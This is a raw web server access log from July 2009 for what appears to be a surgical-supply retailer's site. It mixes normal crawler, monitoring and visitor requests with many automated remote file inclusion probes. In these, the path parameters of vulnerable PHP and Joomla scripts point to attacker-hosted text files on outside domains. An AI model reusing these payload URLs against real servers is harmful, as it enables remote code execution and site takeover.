218.38.18.31 - - [28/Jul/2009:00:18:01 -0400] "GET /logs/access_log.Q109051600%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
220.181.7.97 - - [28/Jul/2009:00:18:11 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
208.113.221.110 - - [28/Jul/2009:00:19:28 -0400] "GET /inurl:eventos.php?id= HTTP/1.1" 404 215 "-" "-"
208.113.221.110 - - [28/Jul/2009:00:19:28 -0400] "GET /logs/error_log.Q109051400%20/inurl:eventos.php?id= HTTP/1.1" 404 242 "-" "-"
208.113.221.110 - - [28/Jul/2009:00:19:28 -0400] "GET /logs/inurl:eventos.php?id= HTTP/1.1" 404 220 "-" "-"
202.125.45.45 - - [28/Jul/2009:00:19:55 -0400] "GET /logs/access_log.Q109061100/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
202.125.45.45 - - [28/Jul/2009:00:19:55 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
202.125.45.45 - - [28/Jul/2009:00:19:55 -0400] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
218.145.31.242 - - [28/Jul/2009:00:20:03 -0400] "GET /logs/access_log.Q109061300/contenido/classes/class.inuse.php?cfg[path][contenido]=http://ora.by/language/idxx.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
218.145.31.242 - - [28/Jul/2009:00:20:03 -0400] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://ora.by/language/idxx.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
218.145.31.242 - - [28/Jul/2009:00:20:03 -0400] "GET /logs/contenido/classes/class.inuse.php?cfg[path][contenido]=http://ora.by/language/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.145.31.242 - - [28/Jul/2009:00:20:03 -0400] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://ora.by/language/idxx.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
218.145.31.242 - - [28/Jul/2009:00:20:04 -0400] "GET /logs/contenido/classes/class.inuse.php?cfg[path][contenido]=http://ora.by/language/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.145.31.242 - - [28/Jul/2009:00:20:04 -0400] "GET /logs/access_log.Q109061300/contenido/classes/class.inuse.php?cfg[path][contenido]=http://ora.by/language/idxx.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:00:20:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.191.37.60 - - [28/Jul/2009:00:21:01 -0400] "GET /logs/access_log.Q109052900//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
88.191.37.60 - - [28/Jul/2009:00:21:05 -0400] "GET /logs/access_log.Q109051500//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
99.229.100.96 - - [28/Jul/2009:00:22:16 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:16 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:16 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:16 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:17 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:17 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:17 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:17 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:17 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:17 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:17 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:17 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:17 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:17 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:17 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:17 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:17 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:17 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:19 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:19 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:19 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:19 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:19 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:19 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:19 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:19 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:19 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:19 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
99.229.100.96 - - [28/Jul/2009:00:22:19 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://74.125.95.132/search?q=cache:vSk4M7A1YKIJ:www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2BM37+CGI-BIN/LANSAWEB%3F&cd=330&hl=en&ct=clnk&gl=ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
66.249.71.204 - - [28/Jul/2009:00:25:02 -0400] "GET /images/download_CD_lg.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
209.59.12.99 - - [28/Jul/2009:00:25:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.22.169 - - [28/Jul/2009:00:25:22 -0400] "GET /logs/access_log.Q109010800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
96.246.5.61 - - [28/Jul/2009:00:25:50 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/registration_advanced.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)"
96.246.5.61 - - [28/Jul/2009:00:25:50 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/registration_advanced.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)"
96.246.5.61 - - [28/Jul/2009:00:25:50 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/registration_advanced.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)"
96.246.5.61 - - [28/Jul/2009:00:25:50 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/registration_advanced.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)"
74.6.22.169 - - [28/Jul/2009:00:25:55 -0400] "GET /images/_notes/circle_CD_off.jpg.mno HTTP/1.0" 200 250 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
202.125.45.45 - - [28/Jul/2009:00:26:03 -0400] "GET /logs/access_log.Q109061100/index.php?_REQUEST=&_REQUEST[option]=option,com_mkpostman&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
202.125.45.45 - - [28/Jul/2009:00:26:03 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_mkpostman&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
202.125.45.45 - - [28/Jul/2009:00:26:03 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_mkpostman&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
89.234.63.107 - - [28/Jul/2009:00:27:16 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://ora.by/language/tukulid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
89.234.63.107 - - [28/Jul/2009:00:27:16 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://ora.by/language/tukulid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
89.234.63.107 - - [28/Jul/2009:00:27:16 -0400] "GET /logs/error_log.Q109063000//include/print_category.php?setup[use_category]=1&dir=http://ora.by/language/tukulid.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
89.234.63.107 - - [28/Jul/2009:00:27:16 -0400] "GET /logs/error_log.Q109070200//include/print_category.php?setup[use_category]=1&dir=http://ora.by/language/tukulid.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
218.38.18.31 - - [28/Jul/2009:00:27:49 -0400] "GET /logs/access_log.Q109051100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
66.249.71.172 - - [28/Jul/2009:00:28:06 -0400] "GET /logs/access_log.Q109062800 HTTP/1.1" 200 2206435 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.234.63.107 - - [28/Jul/2009:00:29:23 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://ora.by/language/tukulid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
89.234.63.107 - - [28/Jul/2009:00:29:23 -0400] "GET /logs/error_log.Q109063000//include/print_category.php?setup[use_category]=1&dir=http://ora.by/language/tukulid.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
89.234.63.107 - - [28/Jul/2009:00:29:23 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://ora.by/language/tukulid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
89.234.63.107 - - [28/Jul/2009:00:29:24 -0400] "GET /logs/error_log.Q109070200//include/print_category.php?setup[use_category]=1&dir=http://ora.by/language/tukulid.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.12.99 - - [28/Jul/2009:00:30:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.55.179.121 - - [28/Jul/2009:00:30:44 -0400] "GET /logs/access_log.Q109071500//bbs//skin/ggambo7002_board/write.php?dir=http://ora.by/language/idxx.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
72.55.179.121 - - [28/Jul/2009:00:30:44 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://ora.by/language/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
72.55.179.121 - - [28/Jul/2009:00:30:44 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://ora.by/language/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.55.179.121 - - [28/Jul/2009:00:30:49 -0400] "GET /logs/access_log.Q109071400//bbs//skin/ggambo7002_board/write.php?dir=http://ora.by/language/idxx.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
72.55.179.121 - - [28/Jul/2009:00:30:50 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://ora.by/language/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
72.55.179.121 - - [28/Jul/2009:00:30:50 -0400] "GET /logs/access_log.Q109071500//bbs//skin/ggambo7002_board/write.php?dir=http://ora.by/language/idxx.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
72.55.179.121 - - [28/Jul/2009:00:30:50 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://ora.by/language/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.55.179.121 - - [28/Jul/2009:00:30:54 -0400] "GET /logs/access_log.Q109071400//bbs//skin/ggambo7002_board/write.php?dir=http://ora.by/language/idxx.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
72.55.179.121 - - [28/Jul/2009:00:31:33 -0400] "GET /logs/access_log.Q109071500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://ora.by/language/idxx.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
72.55.179.121 - - [28/Jul/2009:00:31:33 -0400] "GET /logs/access_log.Q109071400%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://ora.by/language/idxx.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
72.55.179.121 - - [28/Jul/2009:00:31:37 -0400] "GET /logs/access_log.Q109071500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://ora.by/language/idxx.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
72.55.179.121 - - [28/Jul/2009:00:31:37 -0400] "GET /logs/access_log.Q109071400%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://ora.by/language/idxx.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jul/2009:00:34:32 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jul/2009:00:34:32 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jul/2009:00:34:33 -0400] "GET /logs/access_log.Q109071600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:00:35:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.23.158.226 - - [28/Jul/2009:00:35:29 -0400] "GET /logs/access_log.Q109071600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
202.125.45.45 - - [28/Jul/2009:00:36:02 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_zoom&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
202.125.45.45 - - [28/Jul/2009:00:36:02 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_zoom&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
202.125.45.45 - - [28/Jul/2009:00:36:02 -0400] "GET /logs/access_log.Q109051000/index.php?_REQUEST=&_REQUEST[option]=option,com_zoom&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
